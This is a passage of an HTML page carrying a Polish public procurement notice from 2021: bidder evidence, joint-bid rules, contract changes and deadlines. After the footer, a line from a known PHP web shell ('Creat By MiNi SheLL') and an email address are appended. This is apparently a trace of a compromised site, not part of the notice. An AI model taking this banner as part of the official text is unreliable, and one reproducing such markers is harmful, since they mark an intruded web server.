doSWZ;4) Z zobowiązanie ma potwierdzać, że stosunek łączący Wykonawcę z podmiotamiudostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać wszczególności:a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającegozasoby;b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobówpodmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresiepodmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu dowarunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lubdoświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W zakresie niepodlegania wykluczeniu – Zamawiający nie żądapodmiotowych środków dowodowych w tym zakresie.2. W zakresie spełniania warunków udziału wpostępowaniu:a) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacjizawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dodysponowania tymi osobami (wzór wykazu zostanie przekazany wraz z wezwaniem).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony formularz ofertowy (wg wzoru Formularz ofertowy – Zał. Nr 1 do SWZ)2.Pełnomocnictwo – w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy ofertazostała złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówieniazgodnie z art. 58 ustawy Pzp.1. Oświadczenie o niepodleganiu wykluczeniu – na lub zgodnie zzał. Nr 2 do SWZ. 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu – na lubzgodnie z zał. Nr 3 do SWZ.3. W przypadku Wykonawców wspólnie ubiegających się oudzielenie zamówienia: 1) każdy Wykonawca, w celu potwierdzenia, że nie podlega wykluczeniuoraz spełnia warunki udziału w postępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia,o których mowa w pkt 1 i 2;2) należy złożyć oświadczenie dotyczące realizacji zakresuprzedmiotu zamówienia przez poszczególnych Wykonawców – na lub zgodnie z zał. Nr 3a doSWZ.4. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunków udziału wpostępowaniu polega na zdolnościach lub sytuacji innego podmiotu udostępniającego zasoby,zobowiązany jest złożyć:1) Oświadczenie potwierdzające brak podstaw wykluczenia tegopodmiotu- na lub zgodnie z zał. Nr 2 do SWZ. 2) Oświadczenie potwierdzające spełnieniewarunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jegozasoby - na lub zgodnie z zał. Nr 3 do SWZ. 3) Zobowiązanie podmiotu udostępniającegozasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danegozamówienia lub inny środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,będzie dysponował niezbędnymi zasobami tych podmiotów – na lub zgodnie z zał. Nr 3b doSWZ;4) Z zobowiązanie ma potwierdzać, że stosunek łączący Wykonawcę z podmiotamiudostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać wszczególności:a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającegozasoby;b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobówpodmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresiepodmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu dowarunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lubdoświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) każdyWykonawca, w celu potwierdzenia, że nie podlega wykluczeniu oraz spełnia warunki udziału wpostępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia o niepodleganiu wykluczeniu –na lub zgodnie z zał. Nr 2 do SWZ oraz o spełnieniu warunków udziału w postępowaniu - na lubzgodnie z zał. Nr 3 do SWZ.2) należy złożyć oświadczenie dotyczące realizacji zakresuprzedmiotu zamówienia przez poszczególnych Wykonawców – na lub zgodnie z zał. Nr 3a doSWZ.3) należy złożyć pełnomocnictwo – zgodnie z art. 58 ustawy Pzp.W przypadku składaniajednej oferty przez dwa lub więcej podmiotów (Wykonawców ubiegających się wspólnie oudzielenie zamówienia np. konsorcja, spółki cywilne) oferta spełniać musi następującewymagania:1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu oudzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawiezamówienia publicznego. Pełnomocnictwo należy sporządzić zgodnie z zapisami określonymi wpkt. 4-5;2) oferta musi być złożona w postaci elektronicznej, podpisana kwalifikowanympodpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, w taki sposób, byprawnie zobowiązywała wszystkich Wykonawców występujących wspólnie;3) wszelkakorespondencja dokonywana będzie wyłącznie z podmiotem występującym jako reprezentantpozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 454 ust. 1 ustawy Pzp, Zamawiający dopuszcza wprowadzenie zmian dozawartej umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcyw następujących przypadkach:1) terminu realizacji zamówienia;2) podwykonawstwa, w zakresiepowierzenia Podwykonawcom wykonania części zamówienia (w przypadku braku takiejdeklaracji w Ofercie Wykonawcy) lub powierzenia innej części zamówienia niż wskazana wOfercie Wykonawcy;3) zmiany wynagrodzenia.2. Zmiany, o których mowa w ust. 1 mogą byćdokonane w następujących przypadkach:1) konieczność zmiany terminu wykonania zamówieniaz powodu:a) zaistnienia okoliczności, nie leżących po stronie Wykonawcy, a uniemożliwiającychmu, dotrzymania terminu wykonania zamówienia lub też w istotny sposób utrudniającemożliwość spełniania świadczenia w terminie. Wykonawca będzie mógł zwrócić się doZamawiającego z uzasadnionym wnioskiem o przedłużenie terminu wykonania zamówienia;b)działania siły wyższej, tj. nadzwyczajnego zdarzenia lub okoliczności, których nie można byłoani przewidzieć ani im zapobiec;c) z przyczyn zależnych od Zamawiającego;2) zmianywysokości wynagrodzenia z powodu: a) zmiany cen materiałów lub kosztów związanych zrealizacją zamówienia, o których mowa w art. 439 ust. 1 ustawy Pzp;b) zmiany przepisów prawaw zakresie przewidzianym w art. 436 pkt. 4 ustawy Pzp.3) zawsze, gdy zmiany są korzystne dlaZamawiającego lub są niezbędne dla prawidłowej realizacji przedmiotu umowy;4) zawsze, gdyzmiany dotyczą okoliczności, o których mowa w ust. 2 pkt 2).3. Strona wnioskująca o zmianęUmowy, przedkłada drugiej Stronie pisemne uzasadnienie konieczności wprowadzenia zmian doUmowy. W przypadkach określonych w ust. 2 pkt. 2 lit. a) i b) ma zastosowanie § 14 umowy.4.Zmiany mogą być inicjowane przez Zamawiającego lub Wykonawcę, z tym zastrzeżeniem, żeżaden z powyższych zapisów nie obliguje Zamawiającego do wprowadzenia jakiejkolwiek zmiany, a jedynie wprowadza taką możliwość. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej, pod rygorem nieważności na Platformie Zakupowej Marketplanet pod adresem https:/pb.ezamawiajacy.pl w zakładce „Oferty”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com